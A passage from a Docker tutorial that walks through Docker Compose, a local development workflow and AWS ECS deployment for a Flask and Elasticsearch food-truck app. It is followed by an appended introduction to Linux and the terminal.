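        ["docker", "run", "-d", "--net", network, "-p", "5000:5000",
         "--name", "foodtrucks-web", image],
    ]


def run_all(commands, dry_run=True):
    """Print each command; execute it only when dry_run is False."""
    for argv in commands:
        print("$", shlex.join(argv))
        if not dry_run:
            # check=True raises on the first failing step instead of carrying on.
            subprocess.run(argv, check=True)


if __name__ == "__main__":
    run_all(build_commands())
```

Passing dry_run=False would actually execute the commands, so that switch is best flipped only on a machine where Docker is installed and the names are free.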

Now imagine you are distributing your app to a friend, or running on a server that has docker installed. You can get a whole app running with just one command!

$ git clone https://github.com/prakhar1989/FoodTrucks
$ cd FoodTrucks
$ ./setup-docker.sh

And that's it! If you ask me, I find this to be an extremely awesome and powerful way of sharing and running your applications!

Docker Compose

Till now we've spent all our time exploring the Docker client. In the Docker ecosystem, however, there are a bunch of other open-source tools which play very nicely with Docker. A few of them are -

Docker Machine - Create Docker hosts on your computer, on cloud providers, and inside your own data center
Docker Compose - A tool for defining and running multi-container Docker applications.
Docker Swarm - A native clustering solution for Docker
Kubernetes - Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.

In this section, we are going to look at one of these tools, Docker Compose, and see how it can make dealing with multi-container apps easier.

The background story of Docker Compose is quite interesting. Roughly around January 2014, a company called OrchardUp launched a tool called Fig. The idea behind Fig was to make isolated development environments work with Docker. The project was very well received on Hacker News - I oddly remember reading about it but didn't quite get the hang of it.

The first comment on the forum actually does a good job of explaining what Fig is all about.

So really at this point, that's what Docker is about: running processes. Now Docker offers a quite rich API to run the processes: shared volumes (directories) between containers (i.e. running images), forward port from the host to the container, display logs, and so on. But that's it: Docker as of now, remains at the process level.

While it provides options to orchestrate multiple containers to create a single "app", it doesn't address the management of such group of containers as a single entity. And that's where tools such as Fig come in: talking about a group of containers as a single entity. Think "run an app" (i.e. "run an orchestrated cluster of containers") instead of "run a container".

It turns out that a lot of people using docker agree with this sentiment. Slowly and steadily as Fig became popular, Docker Inc. took notice, acquired the company and re-branded Fig as Docker Compose.

So what is Compose used for? Compose is a tool that is used for defining and running multi-container Docker apps in an easy way. It provides a configuration file called docker-compose.yml that can be used to bring up an application and the suite of services it depends on with just one command. Compose works in all environments: production, staging, development, testing, as well as CI workflows, although Compose is ideal for development and testing environments.

Let's see if we can create a docker-compose.yml file for our SF-Foodtrucks app and evaluate whether Docker Compose lives up to its promise.

The first step, however, is to install Docker Compose. If you're running Windows or Mac, Docker Compose is already installed as it comes in the Docker Toolbox. Linux users can easily get their hands on Docker Compose by following the instructions on the docs. Since Compose is written in Python, you can also simply do pip install docker-compose. Test your installation with -

$ docker-compose --version
docker-compose version 1.21.2, build a133471

Now that we have it installed, we can jump to the next step, i.e. the Docker Compose file docker-compose.yml. The syntax for YAML is quite simple and the repo already contains the docker-compose file that we'll be using.

version: "3"
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.3.2
    container_name: es
    environment:
      - discovery.type=single-node
    ports:
      - 9200:9200
    volumes:
      - esdata1:/usr/share/elasticsearch/data
  web:
    image: yourusername/foodtrucks-web
    command: python3 app.py
    depends_on:
      - es
    ports:
      - 5000:5000
    volumes:
      - ./flask-app:/opt/flask-app
volumes:
  esdata1:
    driver: local

Let me break down what the file above means. At the parent level, we define the names of our services - es and web. Each service needs to say where its container comes from, which here is the image parameter, and for each service that we want Docker to run, we can add additional parameters. For es, we just refer to the elasticsearch image available on the Elastic registry. For our Flask app, we refer to the image that we built at the beginning of this section.

Other parameters such as command and ports provide more information about the container. The volumes parameter specifies a mount point in our web container where the code will reside. This is purely optional and is useful if you need access to logs, etc. We'll later see how this can be useful during development. Refer to the online reference to learn more about the parameters this file supports. We also add volumes for the es container so that the data we load persists between restarts. We also specify depends_on, which tells docker to start the es container before web. You can read more about it on docker compose docs.
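
One caveat worth keeping in mind: depends_on in this form only controls start order. It does not wait until Elasticsearch is actually ready to accept requests. A common workaround is to retry the connection from the application side. The sketch below is a hedged illustration using only the standard library; wait_for_service and its parameters are hypothetical names, and how the real app.py handles this is not shown here.

```python
import time
import urllib.request


def wait_for_service(url, attempts=10, delay=3.0,
                     opener=urllib.request.urlopen, sleep=time.sleep):
    """Poll url until it answers or attempts run out; return True on success."""
    for attempt in range(1, attempts + 1):
        try:
            # URLError and HTTPError are subclasses of OSError, so a refused
            # connection, a failed name lookup or an HTTP error all mean "not ready".
            with opener(url, timeout=5):
                return True
        except OSError:
            if attempt < attempts:
                sleep(delay)
    return False
```

Inside the web container this could be called as wait_for_service("http://es:9200") before the app starts loading data, since the es service is reachable by its name on the Compose network.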

Note: You must be inside the directory with the docker-compose.yml file in order to execute most Compose commands.

Great! Now that the file is ready, let's see docker-compose in action. But before we start, we need to make sure the ports and names are free. So if you have the Flask and ES containers running, let's turn them off.

$ docker stop es foodtrucks-web
es
foodtrucks-web

$ docker rm es foodtrucks-web
es
foodtrucks-web

Now we can run docker-compose. Navigate to the food trucks directory and run docker-compose up.

$ docker-compose up
Creating network "foodtrucks_default" with the default driver
Creating foodtrucks_es_1
Creating foodtrucks_web_1
Attaching to foodtrucks_es_1, foodtrucks_web_1
es_1  | [2016-01-11 03:43:50,300][INFO ][node                     ] [Comet] version[2.1.1], pid[1], build[40e2c53/2015-12-15T13:05:55Z]
es_1  | [2016-01-11 03:43:50,307][INFO ][node                     ] [Comet] initializing ...
es_1  | [2016-01-11 03:43:50,366][INFO ][plugins                  ] [Comet] loaded [], sites []
es_1  | [2016-01-11 03:43:50,421][INFO ][env                      ] [Comet] using [1] data paths, mounts [[/usr/share/elasticsearch/data (/dev/sda1)]], net usable_space [16gb], net total_space [18.1gb], spins? [possibly], types [ext4]
es_1  | [2016-01-11 03:43:52,626][INFO ][node                     ] [Comet] initialized
es_1  | [2016-01-11 03:43:52,632][INFO ][node                     ] [Comet] starting ...
es_1  | [2016-01-11 03:43:52,703][WARN ][common.network           ] [Comet] publish address: {0.0.0.0} is a wildcard address, falling back to first non-loopback: {172.17.0.2}
es_1  | [2016-01-11 03:43:52,704][INFO ][transport                ] [Comet] publish_address {172.17.0.2:9300}, bound_addresses {[::]:9300}
es_1  | [2016-01-11 03:43:52,721][INFO ][discovery                ] [Comet] elasticsearch/cEk4s7pdQ-evRc9MqS2wqw
es_1  | [2016-01-11 03:43:55,785][INFO ][cluster.service          ] [Comet] new_master {Comet}{cEk4s7pdQ-evRc9MqS2wqw}{172.17.0.2}{172.17.0.2:9300}, reason: zen-disco-join(elected_as_master, [0] joins received)
es_1  | [2016-01-11 03:43:55,818][WARN ][common.network           ] [Comet] publish address: {0.0.0.0} is a wildcard address, falling back to first non-loopback: {172.17.0.2}
es_1  | [2016-01-11 03:43:55,819][INFO ][http                     ] [Comet] publish_address {172.17.0.2:9200}, bound_addresses {[::]:9200}
es_1  | [2016-01-11 03:43:55,819][INFO ][node                     ] [Comet] started
es_1  | [2016-01-11 03:43:55,826][INFO ][gateway                  ] [Comet] recovered [0] indices into cluster_state
es_1  | [2016-01-11 03:44:01,825][INFO ][cluster.metadata         ] [Comet] [sfdata] creating index, cause [auto(index api)], templates [], shards [5]/[1], mappings [truck]
es_1  | [2016-01-11 03:44:02,373][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
es_1  | [2016-01-11 03:44:02,510][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
es_1  | [2016-01-11 03:44:02,593][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
es_1  | [2016-01-11 03:44:02,708][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
es_1  | [2016-01-11 03:44:03,047][INFO ][cluster.metadata         ] [Comet] [sfdata] update_mapping [truck]
web_1 |  * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)

Head over to the IP to see your app live. That was amazing, wasn't it? Just a few lines of configuration and we have two Docker containers running successfully in unison. Let's stop the services and re-run in detached mode.

web_1 |  * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
Killing foodtrucks_web_1 ... done
Killing foodtrucks_es_1 ... done

$ docker-compose up -d
Creating es               ... done
Creating foodtrucks_web_1 ... done

$ docker-compose ps
      Name                    Command               State                Ports
--------------------------------------------------------------------------------------------
es                 /usr/local/bin/docker-entr ...   Up      0.0.0.0:9200->9200/tcp, 9300/tcp
foodtrucks_web_1   python3 app.py                   Up      0.0.0.0:5000->5000/tcp

Unsurprisingly, we can see both containers running successfully. Where do the names come from? Those were created automatically by Compose. But does Compose also create the network automatically? Good question! Let's find out.

First off, let us stop the services from running. We can always bring them back up with just one command. Data volumes will persist, so it’s possible to start the cluster again with the same data using docker-compose up. To destroy the cluster and the data volumes, just type docker-compose down -v.

$ docker-compose down -v
Stopping foodtrucks_web_1 ... done
Stopping es               ... done
Removing foodtrucks_web_1 ... done
Removing es               ... done
Removing network foodtrucks_default
Removing volume foodtrucks_esdata1

While we're at it, we'll also remove the foodtrucks network that we created last time.

$ docker network rm foodtrucks-net
$ docker network ls
NETWORK ID          NAME                 DRIVER              SCOPE
c2c695315b3a        bridge               bridge              local
a875bec5d6fd        host                 host                local
ead0e804a67b        none                 null                local

Great! Now that we have a clean slate, let's re-run our services and see if Compose does its magic.

$ docker-compose up -d
Recreating foodtrucks_es_1
Recreating foodtrucks_web_1

$ docker container ls
CONTAINER ID        IMAGE                        COMMAND                  CREATED             STATUS              PORTS                    NAMES
f50bb33a3242        yourusername/foodtrucks-web  "python3 app.py"         14 seconds ago      Up 13 seconds       0.0.0.0:5000->5000/tcp   foodtrucks_web_1
e299ceeb4caa        elasticsearch                "/docker-entrypoint.s"   14 seconds ago      Up 14 seconds       9200/tcp, 9300/tcp       foodtrucks_es_1

So far, so good. Time to see if any networks were created.

$ docker network ls
NETWORK ID          NAME                 DRIVER              SCOPE
c2c695315b3a        bridge               bridge              local
f3b80f381ed3        foodtrucks_default   bridge              local
a875bec5d6fd        host                 host                local
ead0e804a67b        none                 null                local

You can see that Compose went ahead and created a new network called foodtrucks_default and attached both the new services to that network so that each of them is discoverable by the other. Each container for a service joins the default network and is both reachable by other containers on that network, and discoverable by them at a hostname identical to the container name.

$ docker ps
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED              STATUS              PORTS                              NAMES
8c6bb7e818ec        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   About a minute ago   Up About a minute   0.0.0.0:9200->9200/tcp, 9300/tcp   es
7640cec7feb7        yourusername/foodtrucks-web                           "python3 app.py"         About a minute ago   Up About a minute   0.0.0.0:5000->5000/tcp             foodtrucks_web_1

$ docker network inspect foodtrucks_default
[
    {
        "Name": "foodtrucks_default",
        "Id": "f3b80f381ed3e03b3d5e605e42c4a576e32d38ba24399e963d7dad848b3b4fe7",
        "Created": "2018-07-30T03:36:06.0384826Z",
        "Scope": "local",
        "Driver": "bridge",
        "EnableIPv6": false,
        "IPAM": {
            "Driver": "default",
            "Options": null,
            "Config": [
                {
                    "Subnet": "172.19.0.0/16",
                    "Gateway": "172.19.0.1"
                }
            ]
        },
        "Internal": false,
        "Attachable": true,
        "Ingress": false,
        "ConfigFrom": {
            "Network": ""
        },
        "ConfigOnly": false,
        "Containers": {
            "7640cec7feb7f5615eaac376271a93fb8bab2ce54c7257256bf16716e05c65a5": {
                "Name": "foodtrucks_web_1",
                "EndpointID": "b1aa3e735402abafea3edfbba605eb4617f81d94f1b5f8fcc566a874660a0266",
                "MacAddress": "02:42:ac:13:00:02",
                "IPv4Address": "172.19.0.2/16",
                "IPv6Address": ""
            },
            "8c6bb7e818ec1f88c37f375c18f00beb030b31f4b10aee5a0952aad753314b57": {
                "Name": "es",
                "EndpointID": "649b3567d38e5e6f03fa6c004a4302508c14a5f2ac086ee6dcf13ddef936de7b",
                "MacAddress": "02:42:ac:13:00:03",
                "IPv4Address": "172.19.0.3/16",
                "IPv6Address": ""
            }
        },
        "Options": {},
        "Labels": {
            "com.docker.compose.network": "default",
            "com.docker.compose.project": "foodtrucks",
            "com.docker.compose.version": "1.21.2"
        }
    }
]
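
The names seen in the output above follow a predictable pattern. The sketch below mimics the convention visible here for Compose 1.x: a project name derived from the directory name, a network called <project>_default, and containers called <project>_<service>_<index> unless container_name overrides it. The normalization rule used (lowercase, then drop everything except letters, digits, hyphens and underscores) is an assumption that differs between Compose versions, and the helper names are hypothetical.

```python
import re


def project_name(directory):
    """Derive a Compose-style project name from a directory name (assumed rule)."""
    return re.sub(r"[^-_a-z0-9]", "", directory.lower())


def default_network(project):
    """Name of the network Compose creates when none is declared."""
    return f"{project}_default"


def container_name(project, service, index=1, override=None):
    """A container_name entry in the YAML file wins over the generated name."""
    return override or f"{project}_{service}_{index}"


if __name__ == "__main__":
    project = project_name("FoodTrucks")
    print(default_network(project))                       # foodtrucks_default
    print(container_name(project, "web"))                 # foodtrucks_web_1
    print(container_name(project, "es", override="es"))   # es
```

This is why the web container shows up as foodtrucks_web_1 while the Elasticsearch container is simply es: only the latter sets container_name in docker-compose.yml.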

Development Workflow

Before we jump to the next section, there's one last thing I wanted to cover about docker-compose. As stated earlier, docker-compose is really great for development and testing. So let's see how we can configure compose to make our lives easier during development.

Throughout this tutorial, we've worked with readymade docker images. While we've built images from scratch, we haven't touched any application code yet and mostly restricted ourselves to editing Dockerfiles and YAML configurations. One thing that you must be wondering is how does the workflow look during development? Is one supposed to keep creating Docker images for every change, then publish it and then run it to see if the changes work as expected? I'm sure that sounds super tedious. There has to be a better way. In this section, that's what we're going to explore.

Let's see how we can make a change in the Foodtrucks app we just ran. Make sure you have the app running -

$ docker container ls
CONTAINER ID        IMAGE                                                 COMMAND                  CREATED             STATUS              PORTS                              NAMES
5450ebedd03c        yourusername/foodtrucks-web                           "python3 app.py"         9 seconds ago       Up 6 seconds        0.0.0.0:5000->5000/tcp             foodtrucks_web_1
05d408b25dfe        docker.elastic.co/elasticsearch/elasticsearch:6.3.2   "/usr/local/bin/dock…"   10 hours ago        Up 10 hours         0.0.0.0:9200->9200/tcp, 9300/tcp   es

Now let's see if we can change this app to display a Hello world! message when a request is made to /hello route. Currently, the app responds with a 404.

$ curl -I 0.0.0.0:5000/hello
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.11.2 Python/2.7.15rc1
Date: Mon, 30 Jul 2018 15:34:38 GMT

Why does this happen? Since ours is a Flask app, we can see app.py for answers. In Flask, routes are defined with @app.route syntax. In the file, you'll see that we only have three routes defined - /, /debug and /search. The / route renders the main app, the debug route is used to return some debug information and finally search is used by the app to query elasticsearch.

$ curl 0.0.0.0:5000/debug
{
  "msg": "yellow open sfdata Ibkx7WYjSt-g8NZXOEtTMg 5 1 618 0 1.3mb 1.3mb\n",
  "status": "success"
}

Given that context, how would we add a new route for hello? You guessed it! Let's open flask-app/app.py in our favorite editor and make the following change

@app.route('/')
def index():
  return render_template("index.html")

# add a new hello route
@app.route('/hello')
def hello():
  return "hello world!"

Now let's try making a request again

$ curl -I 0.0.0.0:5000/hello
HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.11.2 Python/2.7.15rc1
Date: Mon, 30 Jul 2018 15:34:38 GMT

Oh no! That didn't work! What did we do wrong? While we did make the change in app.py, the file resides on our machine (the host machine), but since Docker is running our containers based off the yourusername/foodtrucks-web image, it doesn't know about this change. To validate this, let's try the following -

$ docker-compose run web bash
Starting es ... done
root@581e351c82b0:/opt/flask-app# ls
app.py        package-lock.json  requirements.txt  templates
node_modules  package.json       static            webpack.config.js
root@581e351c82b0:/opt/flask-app# grep hello app.py
root@581e351c82b0:/opt/flask-app# exit

What we're trying to do here is to validate that our changes are not in the app.py that's running in the container. We do this by running the command docker-compose run, which is similar to its cousin docker run but takes additional arguments for the service (which is web in our case). As soon as we run bash, the shell opens in /opt/flask-app as specified in our Dockerfile. From the grep command we can see that our changes are not in the file.

Let's see how we can fix it. First off, we need to tell docker compose to not use the image and instead use the files locally. We'll also set debug mode to true so that Flask knows to reload the server when app.py changes. Replace the web portion of the docker-compose.yml file like so:

version: "3"
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:6.3.2
    container_name: es
    environment:
      - discovery.type=single-node
    ports:
      - 9200:9200
    volumes:
      - esdata1:/usr/share/elasticsearch/data
  web:
    build: . # replaced image with build
    command: python3 app.py
    environment:
      - DEBUG=True # set an env var for flask
    depends_on:
      - es
    ports:
      - "5000:5000"
    volumes:
      - ./flask-app:/opt/flask-app
volumes:
  esdata1:
    driver: local
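
The environment entry only sets a variable inside the container; the application still has to read it. How app.py does that is not shown in this section, so the following is just one plausible sketch (the helper env_flag is hypothetical) of turning DEBUG=True into a boolean that could be handed to Flask's app.run(debug=...).

```python
import os


def env_flag(name, default=False, environ=os.environ):
    """Interpret an environment variable such as DEBUG=True as a boolean."""
    raw = environ.get(name)
    if raw is None:
        return default
    # Environment values are always strings, so compare text, not truthiness.
    return raw.strip().lower() in {"1", "true", "yes", "on"}


if __name__ == "__main__":
    debug = env_flag("DEBUG")
    print("debug mode:", debug)
    # In a Flask app this could become: app.run(host="0.0.0.0", debug=debug)
```

The explicit string comparison matters because a naive bool(os.environ["DEBUG"]) would treat the string "False" as true.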

With that change, let's stop and start the containers.

$ docker-compose down -v
Stopping foodtrucks_web_1 ... done
Stopping es               ... done
Removing foodtrucks_web_1 ... done
Removing es               ... done
Removing network foodtrucks_default
Removing volume foodtrucks_esdata1

$ docker-compose up -d
Creating network "foodtrucks_default" with the default driver
Creating volume "foodtrucks_esdata1" with local driver
Creating es ... done
Creating foodtrucks_web_1 ... done

As a final step, let's make the change in app.py by adding a new route. Now we try to curl

$ curl 0.0.0.0:5000/hello
hello world!

Wohoo! We get a valid response! Try playing around by making more changes in the app.

That concludes our tour of Docker Compose. With Docker Compose, you can also pause your services, run a one-off command on a container and even scale the number of containers. I also recommend you check out a few other use-cases of Docker Compose. Hopefully, I was able to show you how easy it is to manage multi-container environments with Compose. In the final section, we are going to deploy our app to AWS!

AWS Elastic Container Service

In the last section we used docker-compose to run our app locally with a single command: docker-compose up. Now that we have a functioning app we want to share this with the world, get some users, make tons of money and buy a big house in Miami. Executing the last three is beyond the scope of the tutorial, so we'll spend our time instead on figuring out how we can deploy our multi-container apps on the cloud with AWS.

If you've read this far you are pretty much convinced that Docker is a pretty cool technology. And you are not alone. Seeing the meteoric rise of Docker, almost all Cloud vendors started working on adding support for deploying Docker apps on their platform. As of today, you can deploy containers on Google Cloud Platform, AWS, Azure and many others. We already got a primer on deploying single container apps with Elastic Beanstalk and in this section we are going to look at Elastic Container Service (or ECS) by AWS.

AWS ECS is a scalable and super flexible container management service that supports Docker containers. It allows you to operate a Docker cluster on top of EC2 instances via an easy-to-use API. Where Beanstalk came with reasonable defaults, ECS allows you to completely tune your environment as per your needs. This makes ECS, in my opinion, quite complex to get started with.

Luckily for us, ECS has a friendly CLI tool that understands Docker Compose files and automatically provisions the cluster on ECS! Since we already have a functioning docker-compose.yml it should not take a lot of effort in getting up and running on AWS. So let's get started!

The first step is to install the CLI. Instructions to install the CLI on both Mac and Linux are explained very clearly in the official docs. Go ahead, install the CLI and when you are done, verify the install by running

$ ecs-cli --version
ecs-cli version 1.18.1 (7e9df84)

Next, we'll be working on configuring the CLI so that we can talk to ECS. We'll be following the steps as detailed in the official guide on AWS ECS docs. In case of any confusion, please feel free to refer to that guide.

The first step will involve creating a profile that we'll use for the rest of the tutorial. To continue, you'll need your AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY. To obtain these, follow the steps as detailed under the section titled Access Key and Secret Access Key on this page.

$ ecs-cli configure profile --profile-name ecs-foodtrucks --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY

Next, we need to get a keypair which we'll be using to log into the instances. Head over to your EC2 Console and create a new keypair. Download the keypair and store it in a safe location. Another thing to note before you move away from this screen is the region name. In my case, I have named my key - ecs and set my region as us-east-1. This is what I'll assume for the rest of this walkthrough.

[Screenshot: EC2 Keypair]

The next step is to configure the CLI.

$ ecs-cli configure --region us-east-1 --cluster foodtrucks
INFO[0000] Saved ECS CLI configuration for cluster (foodtrucks)

We provide the configure command with the region name we want our cluster to reside in and a cluster name. Make sure you provide the same region name that you used when creating the keypair. If you've not configured the AWS CLI on your computer before, you can use the official guide, which explains everything in great detail on how to get everything going.

The next step enables the CLI to create a CloudFormation template.

$ ecs-cli up --keypair ecs --capability-iam --size 1 --instance-type t2.medium
INFO[0000] Using recommended Amazon Linux 2 AMI with ECS Agent 1.39.0 and Docker version 18.09.9-ce
INFO[0000] Created cluster                               cluster=foodtrucks
INFO[0001] Waiting for your cluster resources to be created
INFO[0001] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
INFO[0062] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
INFO[0122] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
INFO[0182] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
INFO[0242] Cloudformation stack status                   stackStatus=CREATE_IN_PROGRESS
VPC created: vpc-0bbed8536930053a6
Security Group created: sg-0cf767fb4d01a3f99
Subnet created: subnet-05de1db2cb1a50ab8
Subnet created: subnet-01e1e8bc95d49d0fd
Cluster creation succeeded.

Here we provide the name of the keypair we downloaded initially (ecs in my case), the number of instances that we want to use (--size) and the type of instances that we want the containers to run on. The --capability-iam flag tells the CLI that we acknowledge that this command may create IAM resources.

The last and final step is where we'll use our docker-compose.yml file. We'll need to make a few minor changes, so instead of modifying the original, let's make a copy of it. The contents of this file (after making the changes) look like this -

version: '2'
services:
  es:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.6.2
    cpu_shares: 100
    mem_limit: 3621440000
    environment:
      - discovery.type=single-node
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
    logging:
      driver: awslogs
      options:
        awslogs-group: foodtrucks
        awslogs-region: us-east-1
        awslogs-stream-prefix: es
  web:
    image: yourusername/foodtrucks-web
    cpu_shares: 100
    mem_limit: 262144000
    ports:
      - "80:5000"
    links:
      - es
    logging:
      driver: awslogs
      options:
        awslogs-group: foodtrucks
        awslogs-region: us-east-1
        awslogs-stream-prefix: web
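
The mem_limit values in the file above are raw byte counts, which are hard to read at a glance. A small sketch of the arithmetic, assuming binary units (1 MiB = 2**20 bytes, 1 GiB = 2**30 bytes); the helper names are hypothetical.

```python
def bytes_to_mib(n):
    """Convert a byte count to mebibytes."""
    return n / 2**20


def bytes_to_gib(n):
    """Convert a byte count to gibibytes."""
    return n / 2**30


# mem_limit values copied from the compose file above.
LIMITS = {"es": 3621440000, "web": 262144000}

if __name__ == "__main__":
    for service, limit in LIMITS.items():
        print(f"{service}: {bytes_to_mib(limit):.0f} MiB "
              f"({bytes_to_gib(limit):.2f} GiB)")
```

Under that assumption the web limit works out to exactly 250 MiB and the es limit to roughly 3.37 GiB, so the two together stay below the 4 GiB of memory on a t2.medium instance.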

The main changes we made from the original docker-compose.yml are providing the mem_limit (in bytes) and cpu_shares values for each container and adding some logging configuration. The logging configuration allows us to view logs generated by our containers in AWS CloudWatch. Head over to CloudWatch to create a log group called foodtrucks. Note that since ElasticSearch typically ends up taking more memory, we've given it a memory limit of around 3.4 GB. Another thing we need to do before we move on to the next step is to publish our image on Docker Hub.

$ docker push yourusername/foodtrucks-web

Great! Now let's run the final command that will deploy our app on ECS!

$ cd aws-ecs
$ ecs-cli compose up
INFO[0000] Using ECS task definition                     TaskDefinition=ecscompose-foodtrucks:2
INFO[0000] Starting container...                         container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es
INFO[0000] Starting container...                         container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web
INFO[0000] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0000] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0036] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0048] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0048] Describe ECS container status                 container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=PENDING taskDefinition=ecscompose-foodtrucks:2
INFO[0060] Started container...                          container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/web desiredStatus=RUNNING lastStatus=RUNNING taskDefinition=ecscompose-foodtrucks:2
INFO[0060] Started container...                          container=845e2368-170d-44a7-bf9f-84c7fcd9ae29/es desiredStatus=RUNNING lastStatus=RUNNING taskDefinition=ecscompose-foodtrucks:2

It's not a coincidence that the invocation above looks similar to the one we used with Docker Compose. If everything went well, you should see a desiredStatus=RUNNING lastStatus=RUNNING as the last line.

Awesome! Our app is live, but how can we access it?

$ ecs-cli ps
Name                                      State    Ports                     TaskDefinition
845e2368-170d-44a7-bf9f-84c7fcd9ae29/web  RUNNING  54.86.14.14:80->5000/tcp  ecscompose-foodtrucks:2
845e2368-170d-44a7-bf9f-84c7fcd9ae29/es   RUNNING                            ecscompose-foodtrucks:2

Go ahead and open http://54.86.14.14 in your browser and you should see the Food Trucks in all its black-yellow glory! Since we're on the topic, let's see how our AWS ECS console looks.

Cluster

Tasks

We can see above that our ECS cluster called 'foodtrucks' was created and is now running 1 task with 2 container instances. Spend some time browsing this console to get a hang of all the options that are here.

Cleanup

Once you've played around with the deployed app, remember to turn down the cluster -

$ ecs-cli down --force
INFO[0001] Waiting for your cluster resources to be deleted...
INFO[0001] Cloudformation stack status                   stackStatus=DELETE_IN_PROGRESS
INFO[0062] Cloudformation stack status                   stackStatus=DELETE_IN_PROGRESS
INFO[0124] Cloudformation stack status                   stackStatus=DELETE_IN_PROGRESS
INFO[0155] Deleted cluster                               cluster=foodtrucks

So there you have it. With just a few commands we were able to deploy our awesome app on the AWS cloud!

CONCLUSION

And that's a wrap! After a long, exhaustive but fun tutorial you are now ready to take the container world by storm! If you followed along till the very end then you should definitely be proud of yourself. You learned how to setup Docker, run your own containers, play with static and dynamic websites and most importantly got hands on experience with deploying your applications to the cloud!

I hope that finishing this tutorial makes you more confident in your abilities to deal with servers. When you have an idea of building your next app, you can be sure that you'll be able to get it in front of people with minimal effort.

Next Steps

Your journey into the container world has just started! My goal with this tutorial was to whet your appetite and show you the power of Docker. In the sea of new technology, it can be hard to navigate the waters alone and tutorials such as this one can provide a helping hand. This is the Docker tutorial I wish I had when I was starting out. Hopefully, it served its purpose of getting you excited about containers so that you no longer have to watch the action from the sides.

Below are a few additional resources that will be beneficial. For your next project, I strongly encourage you to use Docker. Keep in mind - practice makes perfect!

Additional Resources

Off you go, young padawan!

Give Feedback

Now that the tutorial is over, it's my turn to ask questions. How did you like the tutorial? Did you find the tutorial to be a complete mess or did you have fun and learn something?

Send in your thoughts directly to me or just create an issue. I'm on Twitter, too, so if that's your deal, feel free to holler there!

I would totally love to hear about your experience with this tutorial. Give suggestions on how to make this better or let me know about my mistakes. I want this tutorial to be one of the best introductory tutorials on the web and I can't do it without your help.

Linux OS Installation and Basics

https://linuxtools-rst.readthedocs.io/zh_CN/latest/base/index.html

https://www.tutorialspoint.com/unix/index.htm

https://www.digitalocean.com/community/tutorials/an-introduction-to-linux-basics

What is Unix?

The Unix operating system is a set of programs that act as a link between the computer and the user.

The computer programs that allocate the system resources and coordinate all the details of the computer's internals are called the operating system or the kernel.

Users communicate with the kernel through a program known as the shell. The shell is a command line interpreter; it translates commands entered by the user and converts them into a language that is understood by the kernel.

Unix was originally developed in 1969 by a group of AT&T employees Ken Thompson, Dennis Ritchie, Douglas McIlroy, and Joe Ossanna at Bell Labs.
There are various Unix variants available in the market. Solaris Unix, AIX, HP Unix, and BSD are a few examples. Linux is a freely available Unix-like system that behaves in much the same way.
Several people can use a Unix computer at the same time; hence Unix is called a multiuser system.
A user can also run multiple programs at the same time; hence Unix is a multitasking environment.

Prerequisites

To follow along with this guide, you will need access to a computer running a Linux-based operating system. This can either be a virtual private server that you’ve connected to with SSH or your local machine. Note that this tutorial was validated using a Linux server running Ubuntu 20.04, but the examples given should work on a computer running any version of any Linux distribution.

If you plan to use a remote server to follow this guide, we encourage you to first complete our Initial Server Setup guide. Doing so will set you up with a secure server environment — including a non-root user with sudo privileges and a firewall configured with UFW — which you can use to build your Linux skills.

The Terminal

The terms “terminal,” “shell,” and “command line interface” are often used interchangeably, but there are subtle differences between them:

A terminal is an input and output environment that presents a text-only window running a shell.
A shell is a program that exposes the computer’s operating system to a user or program. In Linux systems, the shell presented in a terminal is a command line interpreter.
A command line interface is a user interface (managed by a command line interpreter program) that processes commands to a computer program and outputs the results.

When someone refers to one of these three terms in the context of Linux, they generally mean a terminal environment where you can run commands and see the results printed out to the terminal, such as this:

Terminal window example

Becoming a Linux expert requires you to be comfortable with using a terminal. Any administrative task, including file manipulation, package installation, and user management, can be accomplished through the terminal. The terminal is interactive: you specify commands to run and the terminal outputs the results of those commands. To execute any command, you type it into the prompt and press ENTER.

When accessing a cloud server, you’ll most often be doing so through a terminal shell. Although personal computers that run Linux often come with the kind of graphical desktop environment familiar to most computer users, it is often more efficient or practical to perform certain tasks through commands entered into the terminal.

Learn to use command help

Overview

In the Linux terminal, when we don't know how to use a command, or can't remember the spelling of a command or its parameters, we turn to the system's help documentation. The built-in help in Linux is very detailed and usually solves the problem, so it pays to know how to use it properly.

When we remember only some keywords of a command, we can search for it with man -k.
